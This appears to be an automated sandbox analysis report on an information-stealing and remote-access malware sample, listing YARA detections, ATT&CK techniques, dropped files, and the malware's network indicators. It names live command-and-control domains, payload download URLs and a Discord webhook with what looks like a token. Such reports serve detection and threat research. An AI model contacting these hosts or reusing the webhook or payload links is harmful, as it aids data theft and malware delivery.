Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Queries volume information: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe VolumeInformation
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Queries volume information: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe VolumeInformation
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Edge\msedge.exe	Queries volume information: C:\Edge\msedge.exe VolumeInformation
Source: C:\Edge\msedge.exe	Queries volume information: C:\Edge\msedge.exe VolumeInformation
Source: C:\Edge\msedge.exe	Queries volume information: C:\Edge\msedge.exe VolumeInformation
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Queries volume information: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Edge\msedge.exe	Queries volume information: C:\Edge\msedge.exe VolumeInformation
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Queries volume information: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe VolumeInformation
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Queries volume information: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe VolumeInformation
Source: C:\Edge\msedge.exe	Queries volume information: C:\Edge\msedge.exe VolumeInformation
Source: C:\Edge\msedge.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation

Source: C:\Users\user\Desktop\gh3zRWl4or.exe

Code function: 0_2_00007FF67418D77C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FF67418D77C

Source: C:\Windows\Speech\kdmapper.exe

Code function: 6_2_0062B146 GetVersionExW,

6_2_0062B146

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: gh3zRWl4or.exe, gh3zRWl4or.exe, 00000000.00000000.1286192249.00007FF674190000.00000002.00000001.01000000.00000003.sdmp, gh3zRWl4or.exe, 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmp

Binary or memory string: ollydbg.exe

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 00000010.00000002.1584842315.0000000013039000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msedge.exe PID: 6632, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: msedge.exe PID: 1504, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 16.0.msedge.exe.b90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.kdmapper.exe.52926cf.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.kdmapper.exe.6a576cf.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.kdmapper.exe.52926cf.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.kdmapper.exe.6a576cf.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000003.1361668958.0000000005244000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.1521808737.0000000000B92000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1359428900.0000000006A09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Edge\msedge.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\Speech\kdmapper.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: 16.0.msedge.exe.b90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.kdmapper.exe.52926cf.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.kdmapper.exe.6a576cf.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.kdmapper.exe.52926cf.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.kdmapper.exe.6a576cf.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Edge\msedge.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\Speech\kdmapper.exe, type: DROPPED

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 00000010.00000002.1584842315.0000000013039000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msedge.exe PID: 6632, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: msedge.exe PID: 1504, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 16.0.msedge.exe.b90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.kdmapper.exe.52926cf.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.kdmapper.exe.6a576cf.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.kdmapper.exe.52926cf.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.kdmapper.exe.6a576cf.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000003.1361668958.0000000005244000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.1521808737.0000000000B92000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1359428900.0000000006A09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Edge\msedge.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\Speech\kdmapper.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: 16.0.msedge.exe.b90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.kdmapper.exe.52926cf.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.kdmapper.exe.6a576cf.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.kdmapper.exe.52926cf.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.kdmapper.exe.6a576cf.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Edge\msedge.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\Speech\kdmapper.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	11 Windows Management Instrumentation	11 Scripting	1 DLL Side-Loading	11 Disable or Modify Tools	11 Input Capture	1 System Time Discovery	1 Taint Shared Content	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Native API	1 DLL Side-Loading	411 Process Injection	111 Deobfuscate/Decode Files or Information	LSASS Memory	3 File and Directory Discovery	Remote Desktop Protocol	1 Screen Capture	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Exploitation for Client Execution	1 Scheduled Task/Job	1 Scheduled Task/Job	4 Obfuscated Files or Information	Security Account Manager	37 System Information Discovery	SMB/Windows Admin Shares	11 Input Capture	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 Command and Scripting Interpreter	21 Registry Run Keys / Startup Folder	21 Registry Run Keys / Startup Folder	3 Software Packing	NTDS	551 Security Software Discovery	Distributed Component Object Model	3 Clipboard Data	113 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 Scheduled Task/Job	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	241 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	1 PowerShell	RC Scripts	RC Scripts	1 File Deletion	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	132 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	241 Virtualization/Sandbox Evasion	Proc Filesystem	1 Remote System Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	411 Process Injection	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
gh3zRWl4or.exe	55%	ReversingLabs	Win64.Spyware.Lummastealer
gh3zRWl4or.exe	100%	Avira	HEUR/AGEN.1317356

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	100%	Avira	HEUR/AGEN.1323342
C:\Edge\L6lFlVnd0szYUYb26bZc.vbe	100%	Avira	VBS/Runner.VPG
C:\Users\user\Desktop\ASIzYbXK.log	100%	Avira	TR/AVI.Agent.updqb
C:\Edge\msedge.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\Desktop\KAbPIEds.log	100%	Avira	TR/PSW.Agent.qngqt
C:\Users\user\AppData\Local\Temp\W7vO5ocqvr.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\Desktop\dZblWXPP.log	100%	Avira	TR/PSW.Agent.qngqt
C:\Users\user\Desktop\HiOQLkRz.log	100%	Avira	TR/AVI.Agent.updqb
C:\Users\user\AppData\Local\Temp\Cb8ciTnPhW.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\Desktop\TqIVmuJi.log	100%	Avira	TR/AVI.Agent.updqb
C:\Users\user\AppData\Local\Temp\NnkzcdwAFb.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\Desktop\XkTUfoHN.log	100%	Avira	TR/PSW.Agent.qngqt
C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	100%	Joe Sandbox ML
C:\Edge\msedge.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\fnSuHmrC.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\aowVPJEW.log	100%	Joe Sandbox ML
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\ZcXEVMnO.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\BegQTYoT.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\KAbPIEds.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\dZblWXPP.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\XkTUfoHN.log	100%	Joe Sandbox ML
C:\Edge\msedge.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\ASIzYbXK.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\BegQTYoT.log	25%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\Desktop\HiOQLkRz.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\KAbPIEds.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\OPvxZeSl.log	29%	ReversingLabs
C:\Users\user\Desktop\TqIVmuJi.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\XkTUfoHN.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\ZcXEVMnO.log	8%	ReversingLabs
C:\Users\user\Desktop\aowVPJEW.log	8%	ReversingLabs
C:\Users\user\Desktop\dZblWXPP.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\fnSuHmrC.log	8%	ReversingLabs
C:\Users\user\Desktop\sozKoiId.log	25%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\Desktop\uNKjQhPt.log	29%	ReversingLabs
C:\Users\user\Desktop\vpYzbqhQ.log	25%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\Desktop\xSuJhsEU.log	29%	ReversingLabs
C:\Windows\Speech\kdmapper.exe	68%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Windows\Speech\physmeme.exe	61%	ReversingLabs	ByteCode-MSIL.Trojan.LummaStealer

Source	Detection	Scanner	Label
https://player.vimeo.com	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://www.gstatic.cn/recaptcha/	0%	URL Reputation	safe
http://store.steampowered.com/subscriber_agreement/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	0%	URL Reputation	safe
https://recaptcha.net/recaptcha/;	0%	URL Reputation	safe
https://medal.tv	0%	URL Reputation	safe
https://broadcast.st.dl.eccdnx.com	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://login.steampowered.com/	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://store.steampowered.com/legal/	0%	URL Reputation	safe
https://steam.tv/	0%	URL Reputation	safe
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900	100%	URL Reputation	malware
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/encoding/	0%	URL Reputation	safe
http://store.steampowered.com/privacy_agreement/	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://recaptcha.net	0%	URL Reputation	safe
https://store.steampowered.com/	0%	URL Reputation	safe
https://lv.queniujq.cn	0%	URL Reputation	safe
http://schemas.xmlsoap.org/wsdl/	0%	URL Reputation	safe
https://checkout.steampowered.com/	0%	URL Reputation	safe
https://help.steampowered.com/	0%	URL Reputation	safe
https://api.steampowered.com/	0%	URL Reputation	safe
http://store.steampowered.com/account/cookiepreferences/	0%	URL Reputation	safe
https://aka.ms/pscore68	0%	URL Reputation	safe
https://store.steampowered.com/;	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
steamcommunity.com	104.102.49.254	true	false	unknown
file.garden	188.114.96.3	true	false	unknown
fossillargeiw.shop	unknown	unknown	true	unknown
strappystyio.shop	unknown	unknown	true	unknown
tiddymarktwo.shop	unknown	unknown	true	unknown
coursedonnyre.shop	unknown	unknown	true	unknown
captainynfanw.shop	unknown	unknown	true	unknown
tearrybyiwo.shop	unknown	unknown	true	unknown
zelensky.top	unknown	unknown	false	unknown
surveriysiop.shop	unknown	unknown	true	unknown
appleboltelwk.shop	unknown	unknown	true	unknown
tendencerangej.shop	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
coursedonnyre.shop	true		unknown
https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin	false		unknown
strappystyio.shop	true		unknown
tearrybyiwo.shop	true		unknown
https://steamcommunity.com/profiles/76561199724331900	true	URL Reputation: malware	unknown
https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin	false		unknown
captainynfanw.shop	true		unknown
fossillargeiw.shop	true		unknown
tiddymarktwo.shop	true		unknown
surveriysiop.shop	true		unknown
appleboltelwk.shop	true		unknown
tendencerangej.shop	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://player.vimeo.com	RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/	RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/	RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.microsoft.co	powershell.exe, 0000001D.00000002.1814705608.000002AB18ABC000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://contoso.com/License	powershell.exe, 0000001E.00000002.1758661770.0000017B40ACD000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin$	curl.exe, 00000005.00000002.1348744210.0000025E1A767000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.gstatic.cn/recaptcha/	RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://store.steampowered.com/subscriber_agreement/	RegAsm.exe, 0000000C.00000002.1399125036.0000000001456000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	RegAsm.exe, 0000000C.00000002.1399125036.0000000001456000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	RegAsm.exe, 0000000C.00000002.1399125036.0000000001456000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.binDj	curl.exe, 00000008.00000002.1365439765.000001D6FD257000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://recaptcha.net/recaptcha/;	RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/profiles/76561199724331900A&	RegAsm.exe, 0000000C.00000002.1399217916.0000000001462000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://www.youtube.com	RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.google.com	RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.w3.	LBUPSPkYsNXrxZEtdVzCng.exe, 00000032.00000002.2023378514.000000000289F000.00000004.00000800.00020000.00000000.sdmp, LBUPSPkYsNXrxZEtdVzCng.exe, 00000033.00000002.1970639828.0000000002AFF000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://medal.tv	RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://broadcast.st.dl.eccdnx.com	RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	RegAsm.exe, 0000000C.00000002.1399125036.0000000001456000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://zelensky.top	LBUPSPkYsNXrxZEtdVzCng.exe, 00000025.00000002.1765228400.0000000002A35000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000036.00000002.2001097433.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://contoso.com/	powershell.exe, 0000001E.00000002.1758661770.0000017B40ACD000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://discord.com/api/webhooks/1247249666907701321/mhniI9J0YWG308w-rJbT6rxKaLF0IflJIgI4sGWLEdUFWwO	gh3zRWl4or.exe	false		unknown
https://nuget.org/nuget.exe	powershell.exe, 0000001D.00000002.1752800619.000002AB106AD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1758661770.0000017B40ACD000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://auth.gg/	gh3zRWl4or.exe	false		unknown
http://crl.micft.cMicRosof	powershell.exe, 0000001D.00000002.1804832305.000002AB18732000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://zelensky.top/	msedge.exe, 00000036.00000002.2001097433.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://zelensky.top/RequestlongpolllinuxTrafficlocalpublicUploads.php	LBUPSPkYsNXrxZEtdVzCng.exe, 00000025.00000002.1765228400.0000000002A35000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000036.00000002.2001097433.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://s.ytimg.com;	RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://login.steampowered.com/	RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	msedge.exe, 00000010.00000002.1577856617.0000000003522000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1623807747.000002AB00641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1624227305.0000017B30A61000.00000004.00000800.00020000.00000000.sdmp, LBUPSPkYsNXrxZEtdVzCng.exe, 00000025.00000002.1765228400.0000000002A35000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000036.00000002.2001097433.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin--outputC:	curl.exe, 00000008.00000002.1365439765.000001D6FD257000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://store.steampowered.com/legal/	RegAsm.exe, 0000000C.00000002.1399125036.0000000001456000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steam.tv/	RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.houseindustries.com/license	gh3zRWl4or.exe	false		unknown
http://www.houseindustries.com/licenseBurbank	gh3zRWl4or.exe	false		unknown
http://nuget.org/NuGet.exe	powershell.exe, 0000001D.00000002.1752800619.000002AB106AD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1758661770.0000017B40ACD000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.houseindustries.comhttp://www.talleming.comHouse	gh3zRWl4or.exe	false		unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000001E.00000002.1624227305.0000017B30C88000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/i&	RegAsm.exe, 0000000C.00000002.1399217916.0000000001462000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 0000001D.00000002.1623807747.000002AB00869000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1624227305.0000017B30C88000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000001E.00000002.1624227305.0000017B30C88000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://store.steampowered.com/privacy_agreement/	RegAsm.exe, 0000000C.00000002.1399125036.0000000001456000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.mic	powershell.exe, 0000001D.00000002.1804832305.000002AB18732000.00000004.00000020.00020000.00000000.sdmp	false		unknown
